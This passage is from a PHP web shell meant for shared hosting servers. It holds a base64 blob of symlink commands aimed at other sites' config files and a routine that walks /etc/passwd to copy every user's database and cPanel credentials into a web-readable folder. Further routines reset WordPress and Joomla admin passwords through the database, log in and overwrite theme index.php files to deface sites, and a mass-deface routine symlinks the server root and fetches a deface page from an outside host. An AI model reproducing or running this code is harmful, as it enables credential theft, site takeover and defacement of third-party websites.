nKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGUvZGIucGhwJywkc2l0ZXNzLictNy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Nvbm5lY3QucGhwJywkc2l0ZXNzLictUEhQLUZ1c2lvbi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy10cmFpZG50MS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy00aW1hZ2VzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2l0ZXMvZGVmYXVsdC9zZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1EcnVwYWwudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWJpbGxpbmdzLnR4dCcpIDsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcmVxdWlyZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLUFNNFNTLWhvc3RpbmcudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0cy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnQudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5nL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWJpbGxpbmcudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZ3MvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGluZ3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxscy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0YmlsbHMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0YmlsbC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0YmlsbC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2xva29tZWRpYS9jb25maWcva29uZWtzaS5waHAnLCRzaXRlc3MsJy1sb2tvbWVkaWEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcva29uZWtzaS5waHAnLCRzaXRlc3MsJy1sb2tvbWVkaWEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wby1jb250ZW50L2NvbmZpZy5waHAnLCRzaXRlc3MsJy1wb3BvamkudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92ZG9fY29uZmlnLnBocCcsJHNpdGVzcywnLVZvb2Rvby50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2J3X2NvbmZpZy9jb25maWcuaW5pJywkc2l0ZXNzLCctYm9zd2ViLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYndfY29uZmlnL2NvbmZpZy5pbmknLCRzaXRlc3MsJy1ib3N3ZWIudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcHAvZXRjL2xvY2FsLnhtbCcsJHNpdGVzcywnLW1hZ2VudG8udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcHAvZXRjL2xvY2FsLnhtbCcsJHNpdGVzcywnLW1hZ2VudG8udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9kYi9rb25la3NpLnBocCcsJHNpdGVzcywnLXVua25vd24udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9kYXRhYi9rb25la3NpLnBocCcsJHNpdGVzcywnLXVua25vd24udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9rb2ZpZ3VyYXNpL2tvbmVrc2kucGhwJywkc2l0ZXNzLCctdW5rbm93bi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmYvY29uZi5waHAnLCRzaXRlc3MsJy11bmtub3duLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2V0ZGF0YWJhc2UucGhwJywkc2l0ZXNzLCctdW5rbm93bi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2RiL3NldGRhdGFiYXNlLnBocCcsJHNpdGVzcywnLXVua25vd24udHh0Jyk7Cn0KcHJpbnQgIjxicj48YnI+PGJyPjxhIGhyZWY9J2VjYm9zcy8nIHN0eWxlPSdjb2xvcjojMDBGRkZGJz5Eb25lIHwgQ2xpY2sgSGVyZSAhPC9mb250PiI7Cg==';
765$file = fopen("ecini.ler" ,"w+");
766$write = fwrite ($file ,base64_decode($config));
767fclose($file);
768 chmod("ecini.ler",0755);
769 echo "<center><a href='ecboss/ecini.ler'>Click Here !</a></center>";
770} elseif($_GET['do'] == 'config') {
771 $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
772 $idx = mkdir("ec_config", 0777);
773 $isi_htc = "Options all\nRequire None\nSatisfy Any";
774 $htc = fopen("ec_config/.htaccess","w");
775 fwrite($htc, $isi_htc);
776 while($passwd = fgets($etc)) {
777 if($passwd == "" || !$etc) {
778 echo "<font color=red>Can't read /etc/passwd</font>";
779 } else {
780 preg_match_all('/(.*?):x:/', $passwd, $user_config);
781 foreach($user_config[1] as $user_idx) {
782 $user_config_dir = "/home/$user_idx/public_html/";
783 if(is_readable($user_config_dir)) {
784 $grab_config = array(
785 "/home/$user_idx/.my.cnf" => "cpanel",
786 "/home/$user_idx/.accesshash" => "WHM-accesshash",
787 "/home/$user_idx/public_html/po-content/config.php" => "Popoji",
788 "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
789 "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
790 "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
791 "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
792 "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
793 "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
794 "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
795 "/home/$user_idx/public_html/forum/config.php" => "phpBB",
796 "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
797 "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
798 "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
799 "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
800 "/home/$user_idx/public_html/configuration.php" => "Joomla",
801 "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
802 "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
803 "/home/$user_idx/public_html/wp-config.php" => "WordPress",
804 "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
805 "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
806 "/home/$user_idx/public_html/application/config/database.php" => "Ellislab",
807 "/home/$user_idx/public_html/db/db.php" => "Unknown",
808 "/home/$user_idx/public_html/setdatabaseb.php" => "Unknown",
809 "/home/$user_idx/public_html/db/setdatabaseb.php" => "Unknown",
810 "/home/$user_idx/public_html/database/db.php" => "Unknown",
811 "/home/$user_idx/public_html/koneksi/db.php" => "Unknown",
812 "/home/$user_idx/public_html/koneksi/database.php" => "Unknown",
813 "/home/$user_idx/public_html/koneksi/koneksi.php" => "Unknown",
814 "/home/$user_idx/public_html/db/config.php" => "Unknown",
815 "/home/$user_idx/public_html/db/database.php" => "Unknown",
816 "/home/$user_idx/public_html/database/config.php" => "Unknown",
817 "/home/$user_idx/public_html/konfigurasi/conf.php" => "Unknown",
818 "/home/$user_idx/public_html/konfigurasi/database.php" => "Unknown",
819 "/home/$user_idx/public_html/konfigurasi/db.php" => "Unknown",
820 "/home/$user_idx/public_html/konfigurasi/config.php" => "Unknown");
821 foreach($grab_config as $config => $nama_config) {
822 $ambil_config = file_get_contents($config);
823 if($ambil_config == '') {
824 } else {
825 $file_config = fopen("ec_config/$user_idx-$nama_config.txt","w");
826 fputs($file_config,$ambil_config);
827 }
828 }
829 }
830 }
831 }
832 }
833 echo "<center><a href='?ec=ciumakumz&folder=$dir/ec_config'><font color=lime>Done</font></a></center>";
834} elseif($_GET['do'] == 'boom') {
835 {error_reporting(0);function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurDebutLien, $text);$ar1=explode($marqueurFinLien, $ar0[$i]);return trim($ar1[0]);}function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$i = 0;$pass = '';while ($i <= 7) {$num = rand() % 33;$tmp = substr($chars, $num, 1);$pass = $pass . $tmp;$i++;}return $pass;}function index_changer_wp($conf, $content) {$output = '';$dol = '$';$go = 0;$username = entre2v2($conf,"define('DB_USER', '","');");$password = entre2v2($conf,"define('DB_PASSWORD', '","');");$dbname = entre2v2($conf,"define('DB_NAME', '","');");$prefix = entre2v2($conf,$dol."table_prefix = '","'");$host = entre2v2($conf,"define('DB_HOST', '","');");$link=mysql_connect($host,$username,$password);if($link) {mysql_select_db($dbname,$link) ;$dol = '$';$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");} else {$output.= "[-] DB Error<br />";}if($req1) {$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data = mysql_fetch_array($req);$site_url=$data["option_value"]; $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");$data = mysql_fetch_array($req);$template = $data["option_value"];$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");$data = mysql_fetch_array($req);$current_theme = $data["option_value"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/wp-login.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);$pos = strpos($buffer,"action=logout");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";$go = 1;}if($go) {$cond = 0;$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"/index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Updated Successfuly<br />";$hk = explode('public_html',$_file);$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));$cond = 1;}} else {$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template Updated Successfuly<br />";$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');$cond = 1;}} else {$output.= "[-] index.php can not load in Theme Editor<br />";}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.'COOKIE.txt');return array('cond'=>$cond, 'output'=>$output);}function index_changer_joomla($conf, $content, $domain) {$doler = '$';$username = entre2v2($conf, $doler."user = '", "';");$password = entre2v2($conf, $doler."password = '", "';");$dbname = entre2v2($conf, $doler."db = '", "';");$prefix = entre2v2($conf, $doler."dbprefix = '", "';");$host = entre2v2($conf, $doler."host = '","';");$co=randomt();$site_url = "http://".$domain."/administrator";$output = '';$cond = 0; $link=mysql_connect($host, $username, $password);if($link) {mysql_select_db($dbname,$link) ;$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));} else {$output.= "[-] DB Error<br />";}if($req1){if ($req) {$req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");$data = mysql_fetch_array($req);$template_name = $data["template"];$req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");$data = mysql_fetch_array($req);$template_id = $data["extension_id"];$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);if($return && $hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_REFERER, $url2);curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos){$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);if($hidden2) {$output.= "[+] index.php file found in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}} else {$req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");$data = mysql_fetch_array($req);$template_name=$data["template"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);if($hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos) {$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);if($hidden2) {$output.= "[+] index.php file founded in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co);$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message fade">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.$co);return array('cond'=>$cond, 'output'=>$output); }function exec_mode_1($def_url) {@mkdir('sym',0777);$wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$fp = @fopen ('sym/.htaccess','w');fwrite($fp, $wr);@symlink('/','sym/root');$dominios = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);$out[1] = array_unique($out[1]);$numero_dominios = count($out[1]);echo "Total domains: $numero_dominios <br><br />";$def = file_get_contents($def_url);$def = urlencode($def);$dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5vcmcvZGVmYWNlZC8yMDEzLzAzLzE5L2Fzc29jaWFwcmVzcy5uZXQnKTsNCiRwID0gZXhwbG9kZSgncHVibGljX2h0bWwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uJ3B1YmxpY19odG1sJzsNCmlmICgkaGFuZGxlID0gb3BlbmRpcigkcCkpIHsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXguaHRtbCcsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXgucGhwJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG0nLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgZWNobyAnRG9uZSc7DQp9DQpjbG9zZWRpcigkaGFuZGxlKTsNCnVubGluayhfX0ZJTEVfXyk7DQo/Pg==';$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';$output = fopen('defaced.html', 'a+');$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;echo '<table style="width:75%;" align="center"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;for($i = $st; $i <= $numero_dominios; $i++){$domain = $out[1][$i];$dono_arquivo = @fileowner("/etc/valiases/".$domain);$infos = @posix_getpwuid($dono_arquivo);if($infos['name']!='root') {$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && 